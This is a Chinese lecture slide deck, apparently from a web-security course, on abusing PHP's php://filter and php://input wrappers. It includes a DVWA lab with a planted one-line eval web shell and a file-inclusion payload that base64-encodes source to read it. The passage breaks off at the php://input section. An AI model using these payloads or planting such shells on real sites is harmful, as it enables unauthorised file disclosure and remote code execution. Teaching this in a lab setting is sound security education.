第27讲phpfilter与phpinput伪协议40课件.pptxVIP

第27讲php://filter与php://input伪协议任毅

引言PHP带有很多内置URL风格的封装协议，可用于类似fopen()、copy()、file_exists()和filesize()的文件系统函数。除了这些封装协议，还能通过stream_wrapper_register()来注册自定义的封装协议。这些伪协议也可以用来渗透。

小测试php有哪些伪协议？php://filterphp://inputfile://data://phar://zip://

学习目标1、能描述php://filter和php://input伪协议的作用2、能完成php://filter和php://input伪协议的利用3、增强php伪协议渗透的防范能力

什么是php伪协议？PHP带了很多内置URL风格的封装协议，可用于fopen、copy、file_exists和filesize等文件系统函数。除了这些内置封装协议，还能通过stream_wrapper_register注册自定义的封装协议。这些协议都被称为伪协议。file://——访问本地文件系统http://——访问HTTP(s)网址ftp://——访问FTP(s)URLsphp://访问各个输入/输出流(I/ostreams)zlib://压缩流data://读取数据(RFC2397)glob://查找匹配的文件路径模式phar://PHP归档ssh2://SecureSheel2rar://RARogg://音频流expect://处理交互式的流

php://filter伪协议php://filter是一种元封装器，设计用于数据流打开时的筛选过滤应用。这对于一体式（all-in-one）的文件函数非常有用，类似readfile()、file()和file_get_contents()，在数据流内容读取之前没有机会应用其他过滤器。简单通俗的说，这是一个中间件，在读入或写入数据的时候对数据进行处理后输出的一个过程。php://filter可以获取指定文件源码。当它与包含函数结合时，php://filter流会被当作php文件执行。所以我们一般对其进行编码，让其不执行。从而导致任意文件读取。

php://filter伪协议协议参数：名称描述resource=要过滤的数据流这个参数是必须的。它指定了你要筛选过滤的数据流。read=读链的筛选列表该参数可选。可以设定一个或多个过滤器名称，以管道符（|）分隔。write=写链的筛选列表该参数可选。可以设定一个或多个过滤器名称，以管道符（|）分隔。；两个链的筛选列表任何没有以read=或write=作前缀的筛选器列表会视情况应用于读或写链。

php://filter伪协议常用方法：php://filter/read=convert.base64-encode/resource=index.phpphp://filter/resource=index.php利用filter协议读文件，将php通过base64编码后进行输出(文件不会被执行）。这样做的好处就是如果不进行编码，文件包含后就不会有输出结果，而是当做php文件执行了（存在安全隐患），而通过编码后则可以读取文件源码。

php://filter实训在DVWA计算机的D:\phpstudy_pro\WWW\dvwa\vulnerabilities\fi目录下准备一名为my1.php的文件，内容为：?php@eval($_REQUEST[cmd]);phpinfo();?，在URL访问时会被执行其中的代码：

php://filter实训但是通过以下形式访问时，返回的是文件内容的Base64编码：30/dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=my1.php

php://filter实训编码为：IDw/cGhwIEBldmFsKCRfUkVRVUVTVFsnY21kJ10pOyBwaHBpbmZvKCk7ID8+DQo=经过Base64解码后，内容为：可见，filter伪协议可绕过PHP文件的执行，能看到该文件的Base64编码，然后通过Base64解码，得知其文件内容。这样就可以避免访问页面被“黑”的风险。

php://input伪协议php://input可以访问请求的原始数据的只读流。当请求方式是post，并且Content-Type不等于“multipart/form-data”时，可以使用php://input来获取原始请求的数据。php://input